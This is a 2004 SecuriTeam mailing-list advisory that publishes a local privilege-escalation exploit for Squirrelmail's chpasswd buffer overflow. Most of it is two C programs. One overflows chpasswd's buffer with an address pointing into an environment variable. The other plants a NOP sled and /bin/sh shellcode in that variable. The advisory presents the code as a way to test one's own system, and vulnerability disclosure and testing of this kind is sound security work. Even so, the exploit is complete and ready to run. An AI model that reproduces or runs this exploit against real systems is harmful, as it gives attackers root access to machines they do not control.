[UNIX] Squirrelmail Change_passwd Buffer Overflow Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/04

  • Next message: SecuriTeam: "[REVS] Using GDB for Vulnerability Developement"
    To: list@securiteam.com
    Date: 19 Apr 2004 12:14:39 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Squirrelmail Change_passwd Buffer Overflow Exploit
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article:
    <http://www.securiteam.com/unixfocus/5OP0F2ACKA.html> Squirrelmail
    Change_passwd Buffer Overflow, a vulnerability in the product allows local
    attackers to gain elevated privileges by overflowing an internal buffer.
    The following exploit code can be used to test your system for the
    mentioned vulnerability.

    DETAILS

    Exploit:
    SPK-chpasswd.c:
    /*
    ** Squirremail's chpasswd local root exploit bY SpikE <spike_vrm at
    mail.com>
    ** Bug found bY Matias Neiff <matias at neiff.com.ar>
    **
    ** Usage: Execute setegg before running this exploit
    **
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    #define BUFSIZE 200

    char *Egg;
    int EggAddr;
    char *chpasswd;

    void doExploit()
    {
     char Buffer[BUFSIZE];
     int *Ptr = (int *)Buffer;
     int i;

     fprintf(stdout,"[+] Egg address: %#010x\n",EggAddr);

     // Build evil buffer
     for(i=0;i<BUFSIZE-4;i+=4)
      *Ptr++ = EggAddr;
     *Ptr = 0;

     // eXplot it!!
     execl(chpasswd,"chpasswd",Buffer,"SPK","HACKED",0);

     // If reach here, error
     fprintf(stdout,"[-] %s not found!!!\n",chpasswd);
    }

    int main(int argc, char **argv)
    {
     printf("==[ Squirremail's chpasswd local root exploit bY SpikE
    <spike_vrm@mail.com> ]==\n\n");
     if(argc != 2)
     {
      printf("Usage: %s <chpasswd-full-path>\n\n",argv[0]);
      exit(0);
     }
     chpasswd = argv[1];
     // Get shellcode address
            Egg = getenv("spkEGG");
            EggAddr = (int)&Egg[0];

     if(EggAddr == 0)
     {
      printf("[-] spkEGG not found. Run \"setegg\" first.\n");
      exit(-1);
     }
     doExploit();

     return(0);
    }

    setegg.c:
    /*
    ** EGG generator bY SpikE <spike_vrm@mail.com>
    **
    ** Usage: Execute this file before running the exploit
    **
    */

    #include <stdio.h>
    #include <stdlib.h>

    #define EGGSIZE 300

    char Shellcode[] =
            
    "AAAAAAA\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

            
    "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
     
    "\x4e\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

    int main()
    {
     char EGG[EGGSIZE];
     char *EGGPtr;
     u_long EGGAddr;

     printf("[+] Creating EGG\n");

     memset(EGG,0,EGGSIZE);
     memcpy(EGG,Shellcode,strlen(Shellcode));
     memcpy(EGG,"spkEGG=",7);
     putenv(EGG);

     system("/bin/bash");
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spike_vrm@mail.com> SpikE
    VrM.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[REVS] Using GDB for Vulnerability Developement"